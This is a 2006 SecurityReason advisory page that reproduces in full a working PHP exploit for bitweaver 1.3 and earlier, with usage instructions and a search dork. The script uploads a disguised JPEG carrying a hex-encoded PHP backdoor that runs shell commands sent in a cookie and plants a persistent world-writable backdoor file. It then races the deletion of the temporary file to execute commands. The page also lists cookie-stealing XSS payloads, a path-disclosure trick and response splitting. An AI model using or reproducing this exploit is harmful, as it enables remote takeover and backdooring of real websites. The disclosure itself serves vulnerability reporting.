|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 1115 CVE : CVE-2006-3105 CVE : CVE-2006-3104 CVE : CVE-2006-3103 CVE : CVE-2006-3102 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : rgod Published : 23.06.2006
Advisory Text : #!/usr/bin/php -q -d short_open_tag=on <? echo "bitweaver <= v1.3 'tmpImagePath' attachment mod_mime exploitrn"; echo "by rgod rgod (at) autistici (dot) org [email concealed]rn"; echo "site: http://retrogod.altervista.orgrn"; echo "dork: "powered by bitweaver"rnrn"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONSrn"; echo "host: target server (ip/hostname)rn"; echo "path: path to bitweaverrn"; echo "cmd: a shell commandrn"; echo "Options:rn"; echo " -p[port]: specify a port other than 80rn"; echo " -P[ip:port]: specify a proxyrn"; echo "Examples:rn"; echo "php ".$argv[0]." localhost /bitweaver/ cat ./../../kernel/config_inc.phprn"; echo "php ".$argv[0]." localhost /bitweaver/ ls -la -p81rn"; echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80rnrn"; die; } /* software site: http://www.bitweaver.org/articles/ i) vulnerable code in articles/BitArticle.php near lines 456-478: ... if( !empty( $_FILES['article_image']['name'] ) ) { // store the image in temp/articles/ $tmpImagePath = TEMP_PKG_PATH.ARTICLES_PKG_NAME.'/'.'temp_'.$_FILES['article_image']['na me']; $tmpImageName = preg_replace( "/(.*)..*?$/", "$1", $_FILES['article_image']['name'] ); if( !is_dir( TEMP_PKG_PATH.ARTICLES_PKG_NAME ) ) { mkdir( TEMP_PKG_PATH.ARTICLES_PKG_NAME ); } if( !move_uploaded_file( $_FILES['article_image']['tmp_name'], $tmpImagePath ) ) { $this->mErrors['article_image'] = "Error during attachment of article image"; } else { $resizeFunc = ( $gBitSystem->getPreference( 'image_processor' ) == 'imagick' ) ? 'liberty_imagick_resize_image' : 'liberty_gd_resize_image'; $pFileHash['source_file'] = $tmpImagePath; $pFileHash['dest_path'] = TEMP_PKG_NAME.'/'.ARTICLES_PKG_NAME.'/'; // remove the extension $pFileHash['dest_base_name'] = $tmpImageName; $pFileHash['max_width'] = ARTICLE_TOPIC_THUMBNAIL_SIZE; $pFileHash['max_height'] = ARTICLE_TOPIC_THUMBNAIL_SIZE; $pFileHash['type'] = $_FILES['article_image']['type']; if( !( $resizeFunc( $pFileHash ) ) ) { $this->mErrors[] = 'Error while resizing article image'; } @unlink( $tmpImagePath ); ... explaination: a remote user can go to: http://[target]/[path]/articles/edit.php to submit an article to the administrator, you can attach an image there. You can submit a file like this, with double extension: suntzu1234.php.xxx a temporary copy of the file is created in temp/articles/ folder and renamed like this: temp_suntzu1234.php.xxx (see $tmpImagePath argument...) you have about 0.1 / 0.2 seconds to launch commands :), because temporary file is deleted http://[target]/[path]/temp/articles/temp_suntzu1234.php.xxx?cmd=dir this works fine on most Apache servers... note: this folder is not properly protected, we have an .htaccess file like this: <FilesMatch ".ph(p(3|4)?|tml)$"> order deny,allow deny from all </FilesMatch> ii) two cross site scripting vulnerabilities: http://[target]/[path_to_bitweaver]/users/login.php?error=<script>alert( document.cookie)</script> http://[target]/[path_to_bitweaver]/articles/index.php?feedback=<script> alert(document.cookie)</script> iii) a trick to see bitweaver "white screen of death": http://[target]/[path_to_bitweaver]/users/index.php?sort_mode=suntzuuuuu uuuuuuuu and disclose full application path, database table prefix ,among other things... iv) various http response splitting vulnerabilities, this is one: http://[target]/[path]/index.php?BWSESSION=%0d%0a[http headers] this is the exploit for i), it creates a backdoor called suntzu.php.xxx in temp/articles/ when you succeed for the first time */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";} } return $exa."rn".$result; } $proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "rn".$html; } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $path=$argv[2]; $cmd="";$port=80;$proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $packet="GET ".$p."temp/articles/suntzu.php.xxx HTTP/1.0rn"; $packet.="User-Agent: GoogleBot/2.1rn"; $packet.="Host: ".$host."rn"; $packet.="Cookie: cmd=".$cmd."rn"; $packet.="Connection: Closernrn"; sendpacketii($packet); if (strstr($html,"*delim*")) { echo "Exploit succeeded...rn"; $temp=explode("*delim*",$html); die($temp[1]); } $shell= chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0xc0).chr(0x3c).ch r(0x3f). chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).ch r(0x72). chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).ch r(0x72). chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).ch r(0x3b). chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).ch r(0x65). chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).ch r(0x30). chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).ch r(0x65). chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).ch r(0x5f). chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).ch r(0x67). chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).ch r(0x24). chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).ch r(0x5b). chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).ch r(0x72). chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).ch r(0x65). chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).ch r(0x4b). chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).ch r(0x29). chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).ch r(0x22). chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).ch r(0x22). chr(0x3b).chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).ch r(0x72). chr(0x75).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).ch r(0x4b). chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).ch r(0x29). chr(0x3b).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).ch r(0x2a). chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x22).ch r(0x3b). chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).chr(0x3d).chr(0x66).ch r(0x6f). chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).chr(0x73).chr(0x75).ch r(0x6e). chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).ch r(0x2e). chr(0x78).chr(0x78).chr(0x78).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).ch r(0x22). chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).ch r(0x74). chr(0x73).chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).ch r(0x3c). chr(0x3f).chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).ch r(0x72). chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).ch r(0x72). chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).ch r(0x3b). chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).ch r(0x65). chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).ch r(0x30). chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).ch r(0x65). chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).ch r(0x5f). chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).ch r(0x67). chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).ch r(0x5c). chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).ch r(0x45). chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).ch r(0x74). chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).ch r(0x68). chr(0x65).chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).ch r(0x4f). chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).ch r(0x64). chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).ch r(0x6f). chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).ch r(0x69). chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).chr(0x70).chr(0x61).ch r(0x73). chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).ch r(0x24). chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).ch r(0x5b). chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).ch r(0x63). chr(0x68).chr(0x6f).chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).ch r(0x65). chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).ch r(0x3f). chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).ch r(0x63). chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).chr(0x24).chr(0x66).ch r(0x70). chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).chr(0x68).chr(0x6d).ch r(0x6f). chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).chr(0x6e).chr(0x74).ch r(0x7a). chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).chr(0x2e).chr(0x78).ch r(0x78). chr(0x78).chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).ch r(0x3b). chr(0x0d).chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).ch r(0x10). chr(0x4a).chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).ch r(0x01). chr(0x00).chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).ch r(0xdb). chr(0x00).chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch r(0x01). chr(0xff).chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).ch r(0x00). chr(0x01).chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).ch r(0x01). chr(0x03).chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).ch r(0x00). chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch r(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch r(0x00). chr(0x08).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).ch r(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch r(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch r(0xff). chr(0xc4).chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).ch r(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch r(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).ch r(0xc4). chr(0x00).chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).ch r(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch r(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).ch r(0x0c). chr(0x03).chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).ch r(0x00). chr(0x3f).chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).ch r(0xd9). chr(0x00).chr(0x00); /* this image has this code inside as EXIF metadata: <?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo "*delim*";passthru($_COOKIE[cmd]);echo "*delim*"; $fp=fopen("suntzu.php.xxx","w"); fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo "*delim*";passthru($_COOKIE[cmd]);echo "*delim*";?>"); fclose($fp); chmod("suntzu.php.xxx",777); ?> */ srand(make_seed()); $anumber = rand(1,99999); $data='-----------------------------7d63b53760260 Content-Disposition: form-data; name="tk" -----------------------------7d63b53760260 Content-Disposition: form-data; name="article_id" -----------------------------7d63b53760260 Content-Disposition: form-data; name="preview_image_url" -----------------------------7d63b53760260 Content-Disposition: form-data; name="preview_image_path" -----------------------------7d63b53760260 Content-Disposition: form-data; name="title" test -----------------------------7d63b53760260 Content-Disposition: form-data; name="author_name" test -----------------------------7d63b53760260 Content-Disposition: form-data; name="article_type_id" 1 -----------------------------7d63b53760260 Content-Disposition: form-data; name="rating" 3 -----------------------------7d63b53760260 Content-Disposition: form-data; name="format_guid" tikiwiki -----------------------------7d63b53760260 Content-Disposition: form-data; name="edit" test -----------------------------7d63b53760260 Content-Disposition: form-data; name="preview" Preview -----------------------------7d63b53760260 Content-Disposition: form-data; name="publishDateInput" 1 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Month" 06 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Day" 15 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Year" 2006 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Hour" 22 -----------------------------7d63b53760260 Content-Disposition: form-data; name="publish_Minute" 33 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expireDateInput" 1 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Month" 06 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Day" 15 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Year" 2007 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Hour" 22 -----------------------------7d63b53760260 Content-Disposition: form-data; name="expire_Minute" 33 -----------------------------7d63b53760260 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1000000 -----------------------------7d63b53760260 Content-Disposition: form-data; name="article_image"; filename="suntzu'.$anumber.'.php.xxx" Content-Type: '.$shell.' -----------------------------7d63b53760260-- '; $packet="POST ".$p."/articles/edit.php HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."articles/edit.phprn"; $packet.="Accept-Language: itrn"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63b53760260rn"; $packet.="Accept-Encoding: gzip, deflatern"; $packet.="User-Agent: GoogleBot/2.1rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Connection: Closernrn"; $packet.=$data; if ($proxy=="") {$ffpp=fsockopen($host,$port);} else { $parts=explode(':',$proxy); $ffpp=fsockopen($parts[0],$parts[1]); } fputs($ffpp,$packet);//we don't need output, quickly look for temporary file... $packet="GET ".$p."temp/articles/temp_suntzu".$anumber.".php.xxx HTTP/1.0rn"; $packet.="User-Agent: GoogleBot/2.1rn"; $packet.="Host: ".$host."rn"; $packet.="Cookie: cmd=".$cmd.";rn"; //through cookies... $packet.="Connection: Closernrn"; for ($i=0; $i<=99; $i++) { sendpacketii($packet); if (strstr($html,"200 OK")){ echo "temp_suntzu".$anumber.".php.xxx file found...rn"; if (!strstr($html,"passthru")) //not executed as php code { echo "Exploit succeeded...rn"; $temp=explode("*delim*",$html); die($temp[1]); } else {echo "Exploit failed...rn";} } } fclose($ffpp); //if you are here... echo "Exploit failed..."; ?> original url: http://retrogod.altervista.org/bitweaver_13_xpl.html Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |